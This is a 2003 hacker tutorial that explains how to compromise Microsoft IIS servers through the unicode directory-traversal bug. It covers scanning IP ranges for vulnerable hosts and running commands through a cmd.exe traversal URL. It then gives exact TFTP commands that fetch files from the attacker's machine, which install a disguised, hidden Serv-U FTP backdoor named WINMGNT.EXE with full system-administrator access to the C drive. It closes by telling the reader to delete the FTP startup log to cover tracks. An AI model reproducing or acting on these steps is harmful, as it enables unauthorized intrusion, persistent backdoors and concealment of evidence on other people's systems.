Toolz Needed: -------------- 1. http://hackerzlair.org/text/toolz.zip 2. Your 3rain q:) HH HH A A C C C K EEEEEEE R R ZZZZZZZ HH HH A A C K // E R R Z ******************* HHHHHHH AaaaaaA C K// EEEEE R R Z * Getting started * HH HH A A C K\\ E R R Z ******************* HH HH A A C C C K \\ EEEEEEE R R ZZZZZZZ 1. Extract the file Toolz.zip to "c:\". # A A IIIIII R R ! # A A II R R ! 2. Go to "c:\ftp\Serv-u" and run "ServUAdmin.exe". # AaaaaaA II R R ! # A A II R R 3. Configurating Serv-u: # # # # A A IIIIII R R  A. Double click on "<< Local Server >>" --> now you should see "Domains", click on it once and double click on "FTP". B. Set a port to the ftp (to apply port --> right click on the background and then "apply"). C. Right click on "Users" and "New User". D. Enter a Username, Password , Home Directory (make it "c:\") and when he asks you: "Lock user in Home directory?" --> select "No" and press "Finish". E. Go to the Privilege field and select "System Administrator". F. Move to the "Dir Access" tab, click once on "c:\" and mark every checkbox in there. G. Right click on the background and select "apply". H. Close Serv-u. 4. Go to "c:\ftp\Serv-u" and copy the file "servudaemon.ini" to "c:\ftp" 5. Configurating TFTP: A. Go to "C:\ftp\TFTP" and run "TFTPServer32.exe" (a nag screen will show up.. Press "register" and then "cancel" ;) B. Once TFTP is up, go to "System --> Setup" (or just Ctrl+U). C. Select the "Inbound" tab and in the "Inbound File Path" field, type "c:\ftp\" . D. Select the "Outbound" tab and in the "Outbound File Path" field, type "c:\ftp" and press "OK". E. Minimize TFTP. 6. Press "Start --> Run" and type in "command". 7. Get into "C:\ftp" and type "sfind -uni IP-START IP-END" (e.g: "sfind -uni 205.179.50.1 205.179.51.1" - This will scan all ips from 205.179.50.1 to 205.179.51.1). ************************************************************************************************************ * Notes: * * A. Once sfind finds an IP, he writes it to the screen (you wont be able to miss it, dont worry). * * B. sfind logs itself on a file named: "sfind.txt" (should be on the same location as the sfind). * ************************************************************************************************************ 8. Once sfind finds a server with the unicode bug, go to "c:\ftp\Accessdiver" and run "ad4.103.exe". 9. In Accessdriver, go to "My Skill --> FAMILIAR", again , go to "My Skill --> Exploiter Mode". 10. Take an IP that was found by sfind and enter it in the "Server" field in this form: "http://ip" (e.g "http://212.179.50.1"). 11. Press "START". 12. After he finished scanning, search for a "Error 502". 13. Once you found a "Error 502", select it and press the eye symbol on the right (if you didn't find any "Error 502", move to the next IIS server). * The explorer will pop once you press the eye symbol and you are suposed to be in this kinda address: http://xxx.xxx.xxx.xx/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ * These are the files that the server holds on drive "c:\" (just like DOS). * Now all you got to do is upload the files "servudaemon.ini" (our FTP configuration file) and "WINMGNT.EXE" and then run "WINMGNT.EXE" on the server. 14. Uploading: A. WINMGNT.EXE - all you need to do is replace the "dir+c:\" in the address with this --> c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+WINMGNT.EXE+c:\WINMGNT.EXE |__________| | The IP address that is written on your TFTP's Title Bar B. servudaemon.ini - same as above.. just replace the "dir+c:\" with --> c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+servudaemon.ini+c:\servudaemon.ini |__________| | The IP address that is written on your TFTP's Title Bar 15. Running WINMGNT.EXE - same as above.. just replace the "dir+c:\" with --> c:\WINMGNT.EXE%20/h **************************************************************************************************************** * * * Last Notes: * * A. Sometimes the server doesn't allow you to upload files (in this case change an IIS server). * * B. When uploading files, you may see the transfer in the TFTP window. * * C. Sometimes the server has a protection which wont let you upload WINMGNT.EXE * * D. When entering the ftp, make sure you delete the log file that was created * * when the ftp created: "ServUStartUpLog.txt" (it should be on the same directory as * * WINMGNT.EXE and servudaemon.ini) * * * **************************************************************************************************************** This file was written by Oc48- © 2003. Hope you enjoyed q;-).